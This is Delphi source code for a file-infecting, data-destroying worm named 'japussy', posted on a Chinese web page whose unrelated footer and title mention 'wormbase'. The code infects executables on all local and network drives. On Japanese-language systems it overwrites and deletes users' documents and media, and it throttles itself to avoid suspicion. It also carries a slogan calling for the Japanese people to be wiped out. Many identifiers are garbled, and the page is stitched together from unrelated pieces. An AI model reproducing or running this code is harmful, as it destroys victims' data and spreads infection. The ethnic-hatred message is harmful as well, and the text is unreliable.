catchword = 'if a race need to be killed out, it must be yamato. ' +
'if a country need to be destroyed, it must be japan! ' +
'*** w32.japussy.worm.a ***';
{$r *.res}
function registerrviceprocess(dwprocessid, dwtype: integer): integer;
stdcall; external 'kernel32.dll'; //函数声明
var
tmpfile: string;
si: startupinfo;
pi: process_information;
isjap: boolean = fal; //日文操作系统标记
{ 判断是否为win9x }
function iswin9x: boolean;
var
ver: tosversioninfo;
begin
result := fal;
ver.dwosversioninfosize := sizeof(tosversioninfo);
if not getversionex(ver) then
exit;
if (ver.dwplatformid = ver_platform_win32_windows) then //win9x
result := true;
end;
{ 在流之间复制 }
procedure copystream(src: tstream; sstartpos: integer; dst: tstream;
dstartpos: integer; count: integer);
var
scurpos, dcurpos: integer;
begin
scurpos := src.position;
dcurpos := dst.position;
src.ek(sstartpos, 0);
dst.ek(dstartpos, 0);
dst.copyfrom(src, count);
src.ek(scurpos, 0);
dst.ek(dcurpos, 0);
end;
{ 将宿主文件从已感染的pe文件中分离出来,以备使用 }
procedure extractfile(filename: string);
var
sstream, dstream: tfilestream;
begin
try
sstream := tfilestream.create(paramstr(0), fmopenread or fmsharedenynone);
try
dstream := tfilestream.create(filename, fmcreate);
try
sstream.ek(headersize, 0); //跳过头部的病毒部分
dstream.copyfrom(sstream, sstream.size - headersize);
finally
dstream.free;
end;
finally
sstream.free;
end;
except
end;
end;
{ 填充startupinfo结构 }
procedure fillstartupinfo(var si: startupinfo; state: word);
begin
si.cb := sizeof(si);
si.lprerved := nil;
si.lpdesktop := nil;
si.lptitle := nil;
si.dwflags := startf_ushowwindow;
si.wshowwindow := state;
si.cbrerved2 := 0;
si.lprerved2 := nil;
end;
{ 发带毒邮件 }
procedure ndmail;
begin
//哪位仁兄愿意完成之?
end;
{ 感染pe文件 }
procedure infectonefile(filename: string);
var
hdrstream, srcstream: tfilestream;
icostream, dststream: tmemorystream;
iid: longint;
aicon: ticon;
infected, ispe: boolean;
i: integer;
buf: array[0..1] of char;
begin
try //出错则文件正在被使用,退出
if comparetext(filename, 'japussy.exe') = 0 then //是自己则不感染
exit;
infected := fal;
ispe := fal;
srcstream := tfilestream.create(filename, fmopenread);
try
for i := 0 to $108 do //检查pe文件头
begin
srcstream.ek(i, sofrombeginning);
srcstream.read(buf, 2);
if (buf[0] = #80) and (buf[1] = #69) then //pe标记
begin
ispe := true; //是pe文件
break;
end;
end;
srcstream.ek(-4, sofromend); //检查感染标记
srcstream.read(iid, 4);
if (iid = id) or (srcstream.size < 10240) then //太小的文件不感染
infected := true;
finally
srcstream.free;
end;
if infected or (not ispe) then //如果感染过了或不是pe文件则退出
exit;
icostream := tmemorystream.create;
dststream := tmemorystream.create;
try
aicon := ticon.create;
try
//得到被感染文件的主图标(744字节),存入流
aicon.releahandle;
aicon.handle := extracticon(hinstance, pchar(filename), 0);
aicon.savetostream(icostream);
finally
aicon.free;
end;
srcstream := tfilestream.create(filename, fmopenread);
//头文件
hdrstream := tfilestream.create(paramstr(0), fmopenread or fmsharedenynone);
try
//写入病毒体主图标之前的数据
copystream(hdrstream, 0, dststream, 0, iconofft);
//写入目前程序的主图标
copystream(icostream, 22, dststream, iconofft, iconsize);
//写入病毒体主图标到病毒体尾部之间的数据
copystream(hdrstream, icontail, dststream, icontail, headersize - icontail);
//写入宿主程序
copystream(srcstream, 0, dststream, headersize, srcstream.size);
//写入已感染的标记
dststream.ek(0, 2);
iid := $44444444;
dststream.write(iid, 4);
finally
hdrstream.free;
end;
finally
srcstream.free;
icostream.free;
dststream.savetofile(filename); //替换宿主文件
dststream.free;
end;
except;
end;
end;
{ 将目标文件写入垃圾码后删除 }
procedure smashfile(filename: string);
var
filehandle: integer;
i, size, mass, max, len: integer;
begin
try
tfileattributes(pchar(filename), 0); //去掉只读属性
filehandle := fileopen(filename, fmopenwrite); //打开文件
try
size := getfilesize(filehandle, nil); //文件大小
i := 0;
randomize;
max := random(15); //写入垃圾码的随机次数
if max < 5 then
max := 5;
mass := size div max; //每个间隔块的大小
len := length(catchword);
while i < max do
begin
fileek(filehandle, i * mass, 0); //定位
//写入垃圾码,将文件彻底破坏掉
filewrite(filehandle, catchword, len);
inc(i);
end;
finally
fileclo(filehandle); //关闭文件
end;
deletefile(pchar(filename)); //删除之
except
end;
end;
{ 获得可写的驱动器列表 }
function getdrives: string;
var
disktype: word;
d: char;
str: string;
i: integer;
begin
for i := 0 to 25 do //遍历26个字母
begin
d := chr(i + 65);
str := d + ':\';
disktype := getdrivetype(pchar(str));
//得到本地磁盘和网络盘
if (disktype = drive_fixed) or (disktype = drive_remote) then
result := result + d;
end;
end;
{ 遍历目录,感染和摧毁文件 }
procedure loopfiles(path, mask: string);
var
i, count: integer;
fn, ext: string;
subdir: tstrings;
archrec: tarchrec;
msg: tmsg;
function isvaliddir(archrec: tarchrec): integer;
begin
if (archrec.attr <> 16) and (archrec.name <> '.') and
(archrec.name <> '..') then
result := 0 //不是目录
el if (archrec.attr = 16) and (archrec.name <> '.') and
(archrec.name <> '..') then
result := 1 //不是根目录
el result := 2; //是根目录
end;
begin
if (findfirst(path + mask, faanyfile, archrec) = 0) then
begin
repeat
peekmessage(msg, 0, 0, 0, pm_remove); //调整消息队列,避免引起怀疑
if isvaliddir(archrec) = 0 then
begin
fn := path + archrec.name;
ext := upperca(extractfileext(fn));
if (ext = '.exe') or (ext = '.scr') then
begin
infectonefile(fn); //感染可执行文件
end
el if (ext = '.htm') or (ext = '.html') or (ext = '.asp') then
begin
//感染html和asp文件,将ba64编码后的病毒写入
//感染浏览此网页的所有用户
//哪位大兄弟愿意完成之?
end
el if ext = '.wab' then //outlook地址簿文件
begin
//获取outlook邮件地址
end
el if ext = '.adc' then //foxmail地址自动完成文件
begin
//获取foxmail邮件地址
end
el if ext = 'ind' then //foxmail地址簿文件
begin
//获取foxmail邮件地址
end
el
begin
if isjap then //是倭文操作系统
begin
if (ext = '.doc') or (ext = '.xls') or (ext = '.mdb') or
(ext = '.mp3') or (ext = '.rm') or (ext = '.ra') or
(ext = '.wma') or (ext = '.zip') or (ext = '.rar') or
(ext = '.mpeg') or (ext = '.asf') or (ext = '.jpg') or
(ext = '.jpeg') or (ext = '.gif') or (ext = '.swf') or
(ext = '.pdf') or (ext = '.chm') or (ext = '.avi') then
smashfile(fn); //摧毁文件
end;
end;
end;
//感染或删除一个文件后睡眠200毫秒,避免cpu占用率过高引起怀疑
sleep(200);
until (findnext(archrec) <> 0);
end;
findclo(archrec);
subdir := tstringlist.create;
if (findfirst(path + '*.*', fadirectory, archrec) = 0) then
begin
repeat
if isvaliddir(archrec) = 1 then
subdir.add(archrec.name);
until (findnext(archrec) <> 0);
end;
findclo(archrec);
count := subdir.count - 1;
for i := 0 to count do
loopfiles(path + subdir.strings + '\', mask);
freeandnil(subdir);
end;
{ 遍历磁盘上所有的文件 }
procedure infectfiles;
var
driverlist: string;
i, len: integer;
begin
if getacp = 932 then //日文操作系统
isjap := true; //去死吧!
driverlist := getdrives; //得到可写的磁盘列表
len := length(driverlist);
while true do //死循环
begin
for i := len downto 1 do //遍历每个磁盘驱动器
loopfiles(driverlist + ':\', '*.*'); //感染之
ndmail; //发带毒邮件
sleep(1000 * 60 * 5); //睡眠5分钟
end;
end;
{ 主程序开始 }
begin
if iswin9x then //是win9x
registerrviceprocess(getcurrentprocessid, 1) //注册为服务进程
el //winnt
begin
//远程线程映射到explorer进程
//哪位兄台愿意完成之?
end;
//如果是原始病毒体自己
if comparetext(extractfilename(paramstr(0)), 'japussy.exe') = 0 then
infectfiles //感染和发邮件
el //已寄生于宿主程序上了,开始工作
begin
tmpfile := paramstr(0); //创建临时文件
delete(tmpfile, length(tmpfile) - 4, 4);
tmpfile := tmpfile + #32 + '.exe'; //真正的宿主文件,多一个空格
extractfile(tmpfile); //分离之
fillstartupinfo(si, sw_showdefault);
createprocess(pchar(tmpfile), pchar(tmpfile), nil, nil, true,
0, nil, '.', si, pi); //创建新进程运行之
infectfiles; //感染和发邮件
end;
end.

本文发布于:2023-02-28 19:09:00,感谢您对本站的认可!

本文链接:https://www.wtabcd.cn/zhishi/a/167760066753005.html

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。

本文word下载地址:wormbase(wormbase.org).doc

本文 PDF 下载地址:wormbase(wormbase.org).pdf

上一篇:使用方法
下一篇:返回列表
标签:wormbase   org
相关文章
留言与评论(共有 0 条评论)
   
验证码:
Copyright ©2019-2022 Comsenz Inc.Powered by © 实用文体写作网旗下知识大全大全栏目是一个全百科类宝库! 优秀范文|法律文书|专利查询|